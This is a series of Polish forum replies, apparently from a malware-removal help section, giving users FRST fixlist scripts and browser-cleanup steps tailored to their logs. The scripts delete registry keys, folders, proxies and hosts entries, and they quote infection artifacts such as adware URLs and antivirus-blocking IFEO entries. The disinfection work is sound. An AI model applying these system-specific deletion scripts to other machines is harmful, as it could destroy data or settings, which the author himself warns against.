karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Użyj najnowszej wersji FRST do generacji raportów: KLIK.

Proszę zapoznać się z zasadami działu: KLIK.

Ten dysk mi się nie podoba*. Podam działania dezynfekcyjne żeby już były. Nie wykonuj ich jednak do póki Groszek nie wypowie się o sprzęcie. * - chyba jest problem z realokowanymi sektorami. To również nie tyczy się tego działu. Jeśli chodzi zaś o system to widoczne są infekcje, instalacje adware. Modyfikacja mapy domen, skrótów przeglądarki (= fałszywy starter), wyszukiwarkach i wiele wiele więcej. Skan MBAM i AdwCleaner pomijam na razie, bo na początku należy użyć własnych mechanizmów deinstalacyjnych adware, by nie zostało śmieciowisko. Dobrze, że zrobiłeś same skany, bez dezynfekcji. Powiedz mi tylko czy włączone serwery proxy są ustawieniem celowym (te nie są zarażone)? P.S: Martwi mnie brak jakiegokolwiek zewnętrznego oprogramowania zabezpieczającego, same zabezpieczenia systemu Windows 7 nie są wystarczające. Przejrzyj - KLIK. Microsoft Security Essentials to słaby produkt, nie zapewni ochrony zwłaszcza na systemie Windows 7. 1. Włącz przywracanie systemu. 2. Przez panel sterownia odinstaluj: Adware / PUP / Sponsorzy instalacyjni: Hola™ 1.34.855 - Better Internet. 3. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: CustomCLSID: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000_Classes\CLSID\{00000001-0E3A-4123-8B32-4B68A91E104A}\InprocServer32 -> C:\Program Files\TOSHIBA\TOSHIBA Places Icon Utility\TosDIBasePlace.dll => No File Task: {813CC27D-1124-4CFE-A7A9-1BF8D640A797} - System32\Tasks\DigitalSite => C:\Users\paulinka\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE Task: C:\Windows\Tasks\DigitalSite.job => C:\Users\paulinka\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE C:\Users\paulinka\AppData\Roaming\DIGITA~1 ShortcutWithArgument: C:\Users\paulinka\AppData\Local\Google\Chrome\User Data\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --show-app-list ShortcutWithArgument: C:\Users\paulinka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --show-app-list HKLM-x32\...\Run: [fst_gb_13] => [X] AppInit_DLLs: c:\progra~3\bitguard\271832~1.68\{c16c1~1\loader.dll => No File AppInit_DLLs: c:\progra~3\bitguard\271769~1.27\{c16c1~1\loader.dll => No File c:\progra~3\bitguard CHR HKLM\SOFTWARE\Policies\Google: Restriction URLSearchHook: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000 - (No Name) - {50fafaf0-70a9-419d-a109-fa4b4ffd4e37} - No File SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000 -> {483830EE-A4CD-4b71-B0A3-3D82E62A6909} URL = BHO-x32: WinZip Courier BHO -> {A8FB70FA-0FDF-4601-9DC4-BFA1B357204F} -> C:\PROGRA~2\WINZIP~2\wzwmcie.dll => No File Toolbar: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File Toolbar: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000 -> No Name - {50FAFAF0-70A9-419D-A109-FA4B4FFD4E37} - No File SearchScopes: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000 -> {31090377-0740-419E-BEFC-A56E50500D5B} URL = hxxp://speedial.com/results.php?f=4&q={searchTerms}&a=spd_wnzp_14_23_ch&cd=2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0Bzy0FyBtDyCzyyC0B0EtN0D0Tzu0SzzzzzytN1L2XzutBtFtBtDtFtCzytFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2StByE0D0D0E0A0D0BtG0Bzzzy0DtGyEyCyD0CtGyC0D0C0CtGyE0DyCyByE0FyCzytByCzz0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0D0CyDzz0DyCtBtG0Czy0ByEtGyB0C0E0AtGtCtDyC0AtGyB0FyB0F0C0BtDtDzzyEyCyC2QtN1B1L1H1E SearchScopes: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000 -> {483830EE-A4CD-4b71-B0A3-3D82E62A6909} URL = SearchScopes: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000 -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites03_14_20_ch&cd=2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0Bzy0FyBtDyCzyyC0B0EtN0D0Tzu0SzzyCzztN1L2XzutBtFtBtDtFtCtAtFtDtN1L1CzutCyEtDtAtDyD1V1OtN1L1G1B1V1N2Y1L1Qzu2SyE0E0C0EtD0CtAtCtGyBtA0B0FtGtA0Fzz0AtGtBzytDtDtGyBzytCyEzytByD0FtCyB0CtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0D0CyDzz0DyCtBtG0Czy0ByEtGyB0C0E0AtGtCtDyC0AtGyB0FyB0F0C0BtDtDzzyEyCyC2Q&cr=1276797276&ir= SearchScopes: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000 -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://search.babylon.com/?q={searchTerms}&affID=121150&babsrc=SP_ss&mntrId=6e7a96be00000000000074de2b037416 SearchScopes: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000 -> {213BD86A-D8DE-47C7-AA9A-CF771C6850EF} URL = hxxps://uk.search.yahoo.com/search?fr=mcafee&type=C011GB91020D20150313&p={searchTerms} SearchScopes: HKLM -> {31090377-0740-419E-BEFC-A56E50500D5B} URL = hxxp://speedial.com/results.php?f=4&q={searchTerms}&a=spd_wnzp_14_23_ch&cd=2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0Bzy0FyBtDyCzyyC0B0EtN0D0Tzu0SzzzzzytN1L2XzutBtFtBtDtFtCzytFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2StByE0D0D0E0A0D0BtG0Bzzzy0DtGyEyCyD0CtGyC0D0C0CtGyE0DyCyByE0FyCzytByCzz0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0D0CyDzz0DyCtBtG0Czy0ByEtGyB0C0E0AtGtCtDyC0AtGyB0FyB0F0C0BtDtDzzyEyCyC2QtN1B1L1H1Ezu1O2U1M1B&cr=2116844849&ir= SearchScopes: HKLM -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites03_14_20_ch&cd=2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0Bzy0FyBtDyCzyyC0B0EtN0D0Tzu0SzzyCzztN1L2XzutBtFtBtDtFtCtAtFtDtN1L1CzutCyEtDtAtDyD1V1OtN1L1G1B1V1N2Y1L1Qzu2SyE0E0C0EtD0CtAtCtGyBtA0B0FtGtA0Fzz0AtGtBzytDtDtGyBzytCyEzytByD0FtCyB0CtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0D0CyDzz0DyCtBtG0Czy0ByEtGyB0C0E0AtGtCtDyC0AtGyB0FyB0F0C0BtDtDzzyEyCyC2Q&cr=1276797276&ir= CHR Extension: (MySearchDial) - C:\Users\paulinka\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\iagcajndpnfncplednpbnkahadegklfa [2017-05-08] StartMenuInternet: Google Chrome.R7UGBHHLDKADMYR2SRVGFTQTX4 - C:\Users\paulinka\AppData\Local\Google\Chrome\Application\chrome.exe S2 SupportSoft RemoteAssist; C:\Program Files (x86)\Common Files\supportsoft\bin\ssrc.exe [X] S3 RSUSBSTOR; System32\Drivers\RtsUStor.sys [X] S3 RSUSBVSTOR; System32\Drivers\RTSUVSTOR.sys [X] DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Stefan\AppData\Local\Mozilla C:\Users\Stefan\AppData\Roaming\Mozilla C:\Users\Stefan\AppData\Roaming\Profiles DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains CMD: type C:\Users\paulinka\AppData\Local\Google\Chrome\User Data\Profile 1\Secure Preferences EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). program uruchamiający aplikacje chrome;program uruchamiajacy aplikacje chrome Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 7. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Proszę przeczytać pkt. 5 i zastosować się do niego.

Dział pomocy doraźnej służy do leczenie systemów z infekcji. Twój temat nie trzyma się tematyki tego działu, a po za tym nawet nie zastosowałeś się do regulaminu tego działu nie dodając raportów. Temat przenoszę do działu Windows XP - i pytanie czy to właśnie nie tu leży problem, w niewspieranym systemie operacyjnym.

Problem z tworzeniem punktu przywracania systemu oraz z usługą Regedit powoduję nieprawidłowy filtr nadany przez resztki oprogramowania AVG. Jeśli zaś chodzi o grę to nie wydaję mi sie, że to problem tej modyfikacji i tym będą się zajmować w dziale Software. Apropos poniższych plików instalatora to proszę poczytaj: Portale z oprogramowaniem / Instalatory - na co uważać. C:\Users\Bartek\Downloads\Memtest86-12556-AsystentPobierania.exe C:\Users\Bartek\Downloads\WindowsDefender(dobreprogramy.pl).msi 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {078CBCCD-0A46-411C-BBF7-4F0AFE3ED89F} - \SCCSpeedBoot -> Brak pliku Task: {3825AB0D-1F39-4341-8095-095397A3AD42} - \{42563A93-3326-421D-A0B1-8B4DDCEB7D8E} -> Brak pliku Task: {398EEFF9-939A-4CF1-A995-CF01B618954F} - System32\Tasks\Update\cryptex => C:\Users\Samsung\AppData\Local\Temp\ariana.exe Task: {4659CF3E-3D29-4C49-AF70-358599729E29} - \EasySettings -> Brak pliku Task: {4DB50C23-3761-45AE-9042-081C287B34E2} - \Adobe Flash Player Updater -> Brak pliku Task: {510BEFB7-DAE2-42C9-B35A-4988566D6F87} - \SAgent -> Brak pliku Task: {BC7CBA99-0358-464C-BD78-F41AB0B679AE} - \Opera scheduled Autoupdate 1429768718 -> Brak pliku Task: {DBC641F2-8C9E-496E-A753-F8D3650A13B1} - \WLANStartup -> Brak pliku Task: {DCE5BA10-9752-44C6-B18F-29FEEEE6FD11} - \EasySettings_config -> Brak pliku HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0 HKLM\...\Policies\Explorer: [HideSCAHealth] 0 IFEO\AvastSvc.exe: [Debugger] nqij.exe IFEO\AvastUI.exe: [Debugger] nqij.exe IFEO\avast_free_antivirus_setup_online_dobreprogramy.exe: [Debugger] C:\ProgramData\648411\sysmon.exe IFEO\avcenter.exe: [Debugger] nqij.exe IFEO\avconfig.exe: [Debugger] nqij.exe IFEO\avgcsrvx.exe: [Debugger] nqij.exe IFEO\avgidsagent.exe: [Debugger] nqij.exe IFEO\avgnt.exe: [Debugger] nqij.exe IFEO\avgrsx.exe: [Debugger] nqij.exe IFEO\avguard.exe: [Debugger] nqij.exe IFEO\avgui.exe: [Debugger] nqij.exe IFEO\avgwdsvc.exe: [Debugger] nqij.exe IFEO\avp.exe: [Debugger] nqij.exe IFEO\avscan.exe: [Debugger] nqij.exe IFEO\bdagent.exe: [Debugger] nqij.exe IFEO\blindman.exe: [Debugger] nqij.exe IFEO\ccuac.exe: [Debugger] nqij.exe IFEO\ComboFix.exe: [Debugger] nqij.exe IFEO\egui.exe: [Debugger] nqij.exe IFEO\fiddler.exe: [Debugger] C:\ProgramData\648411\sysmon.exe IFEO\hijackthis.exe: [Debugger] nqij.exe IFEO\instup.exe: [Debugger] nqij.exe IFEO\keyscrambler.exe: [Debugger] nqij.exe IFEO\mbam.exe: [Debugger] nqij.exe IFEO\mbamgui.exe: [Debugger] nqij.exe IFEO\mbampt.exe: [Debugger] nqij.exe IFEO\mbamscheduler.exe: [Debugger] nqij.exe IFEO\mbamservice.exe: [Debugger] nqij.exe IFEO\MpCmdRun.exe: [Debugger] nqij.exe IFEO\MSASCui.exe: [Debugger] nqij.exe IFEO\MsMpEng.exe: [Debugger] nqij.exe IFEO\msseces.exe: [Debugger] nqij.exe IFEO\regedit.exe: [Debugger] C:\ProgramData\648411\sysmon.exe IFEO\rstrui.exe: [Debugger] nqij.exe IFEO\SDFiles.exe: [Debugger] nqij.exe IFEO\SDMain.exe: [Debugger] nqij.exe IFEO\SDWinSec.exe: [Debugger] nqij.exe IFEO\spybotsd.exe: [Debugger] nqij.exe IFEO\wireshark.exe: [Debugger] nqij.exe IFEO\zlclient.exe: [Debugger] nqij.exe GroupPolicyScripts: Ograniczenia GroupPolicyScripts-x32: Ograniczenia SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = HKU\S-1-5-21-2141313226-3810806181-3511824924-1004\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.amazon.com/gp/bit/amazonserp/ref=bit_bds-p17_serp_ie_us_display?ie=UTF8&tagbase=bds-p17&tbrId=v1_abb-channel-17_08a9e06b_1201_1403_20160816_PL_ie_sp_ SearchScopes: HKU\S-1-5-21-2141313226-3810806181-3511824924-1004 -> {B3B3A6AC-74EC-BD56-BCDB-EFA4799FB9DF} URL = hxxps://www.amazon.com/gp/bit/amazonserp/ref=bit_bds-p17_serp_ie_us_display?ie=UTF8&tagbase=bds-p17&tbrId=v1_abb-channel-17_08a9e06b_1201_1403_20160816_PL_ie_ds_&tag=bds-p17-serp-us-ie-20&query={searchTerms} S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X] S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X] S4 nvpciflt; \SystemRoot\system32\DRIVERS\nvpciflt.sys [X] S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [X] 2017-04-30 22:50 - 2017-04-30 22:50 - 01253040 _____ ( ) C:\Users\Bartek\Downloads\Memtest86-12556-AsystentPobierania.exe 2017-04-30 22:21 - 2017-04-30 22:21 - 05186048 _____ C:\Users\Bartek\Downloads\WindowsDefender(dobreprogramy.pl).msi Reg: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winmgmt /s EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt.

Miałeś dobrego nosa, żeby najpierw tutaj założyć temat. Co prawda nie ma co robić robić paniki, ale korzystasz ze szkodliwe zmodyfikowanej przeglądarki Google Chrome - przez to rozumiem, że został podstawiony prefabrykowany profil. P.S: Martwi mnie brak jakiegokolwiek zewnętrznego oprogramowania zabezpieczającego, same zabezpieczenia systemu Windows 7 nie są wystarczające (MBAM masz w wersji Free czyli bez ochrony w czasie rzeczywistym). Przejrzyj - KLIK. 1. Widoczne podejrzane instlację: Toneforge - Guilty Pleasure version 1.0 (HKLM\...\Toneforge - Guilty Pleasure_is1) (Version: 1.0 - Joey Sturgis Tones) Toneforge - Jason Richardson version 1.0 (HKLM\...\Toneforge - Jason Richardson_is1) (Version: 1.0 - Joey Sturgis Tones) Toneforge - Menace 1.2 version 1.2 (HKLM\...\Toneforge - Menace 1.2_is1) (Version: 1.2 - Joey Sturgis Tones) Toneforge - Menace 1.3 version 1.3 (HKLM\...\Toneforge - Menace 1.3_is1) (Version: 1.3 - Joey Sturgis Tones) Zaznaczone kolorem czerwonym są flagowane przez FRST jako podejrzane, a pozostałe dwa zaznaczone tłustym drukiem to inne programy tego samego producenta, ale nie flagowane. Jeśli nie znasz i nie ufasz tym programom to je odinstaluj. Sugeruję również pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 2. Otwórz Google Chrome następnie: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > Załóż czysty profil > ponownie wejdź do sekcji Osoby i skasuj wszystkie stare profile. 3. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = RemoveDirectory: C:\Users\Andreas\AppData\Local\Google\Chrome\User Data\ChromeDefaultData Task: {89656484-122D-4015-9E79-EB8B9F045B34} - System32\Tasks\Galerentannly Server => C:\Program Files (x86)\Chiviied\plujiing.exe C:\Program Files (x86)\Chiviied ShortcutWithArgument: C:\Users\Andreas\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\user0 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData EmptyTemp: 4. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 5. Zrób nowy log FRST (już bez Addition i ShortCut). Będzie już pewnie od strony infekcji wszystko uporządkowane. Problem tyłowy nie jest powiązany z tym, więc dalsza diagnostyka i ew. naprawa będzie odbywać się w dziale Windows 7.

Plik w porządku. To by było na tyle, - pozdrawiam!

W takim razie możemy kończyć (skoro nie piszesz nic o innych urządzeniach to uznaję, że takich nie było). Zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Zagrożenia (czyli szkodliwe modyfikacje w przeglądarkach) wykryte przez AdwCleaner daj do kasacji (używając opcji Oczyść). EDIT: Sprawdź ten plik: C:\WINDOWS\PUSHVI~1.SCR w usłudze VirusTotal.com i dostarcz link prowadzący do analizy. Jeśli już nic nie będzie wyskakiwało to będziemy kończyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Teraz raporty są w porządku. Niczego już nie zmieniaj, odpowiem jeszcze dziś.

Nic już nie ruszaj (raporty muszą być nieskazitelnie aktualne), odpowiem dziś po południu.

Podłączony pendrive jest zainfekowany infekcją skrótową. Sam system na szczęście nie został zainfekowany, a drobną kosmetykę pomijam, bo jest całkowicie nieistotna. Ponownie proszę podepnij problematycznego pendrive do portu USB i zastosuj opcję dezynfekcji Clean w interfejsie programu USBFix. Sprawdź rezultaty, napisz czy problem ustąpił oraz zastanów się gdzie mogłeś podpiąć tego pendrive oprócz komputera, na którym generowałeś raporty.

Problem wyskakujących natarczywie reklam tworzą ustawione w Twoim systemie szkodliwe serwery proxy unstopweb. Czyszczę sekcję proxy, plik hosts (nie podoba mi się jego zawartość) oraz pliki tymczasowe. Sprzątam również resztki po programach. Portale z oprogramowaniem / Instalatory - na co uważać. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {1CCAF257-F654-498A-BB68-C714D7C8009A} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku AutoConfigURL: [s-1-5-21-1013101086-2419507280-623597535-1001] => hxxp://unstopweb.com/wpad.dat?1d95a665bb3c251bae6d3ae14a1b8c5e30212925 ManualProxies: 0hxxp://unstopweb.com/wpad.dat?1d95a665bb3c251bae6d3ae14a1b8c5e30212925 HKU\S-1-5-21-1013101086-2419507280-623597535-1001\Software\Microsoft\Internet Explorer\Main,Start Page = U3 pgtdyuob; C:\Users\Admin\AppData\Local\Temp\pgtdyuob.sys [56584 2017-05-08] (GMER) [brak podpisu cyfrowego] C:\Users\Admin\Desktop\M\AVG Protection.lnk C:\Users\Admin\AppData\Roaming\Microsoft\PowerPoint\Symbole-miłości305903871815446276\Symbole-miłości.pptx.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LEGO STAR WARS The Force Awakens\LEGO STAR WARS The Force Awakens.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LEGO STAR WARS The Force Awakens\Uninstall LEGO STAR WARS The Force Awakens.lnk Hosts: RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

W systemie brak oznak infekcji. Spróbuj odinstalować AVG i poobserwuj czy to da jakieś rezultaty. Temat przenoszę do działu Windows 7. 1. Przez panel sterowania odinstaluj i przeczytaj sugestię: Sponsorzy instalacyjni / Zbędniki: McAfee Security Scan Plus. Sugeruję pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 2. Otwórz Notatnik w nim wklej: Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = S3 cpuz136; \??\C:\Windows\TEMP\cpuz136\cpuz136_x64.sys [X] S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] Task: {20943EAC-2C6D-48D4-A6AF-D07DE9B3E83E} - System32\Tasks\LUKASZChicleBouzoukiV2 => Rundll32.exe RechercheWintergreen.dll,main 7 1 AlternateDataStreams: C:\ProgramData\TEMP:1CE11B51 [314] EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Ze strony tego działu to tyle. Nie musisz dostarczać już żadnych nowych logów ani raportu wynikowego.

Proszę jeszcze o raport USBFix z opcji Listing oraz Research zrobiony przy wszystkich podpiętych problematycznych pendrivach.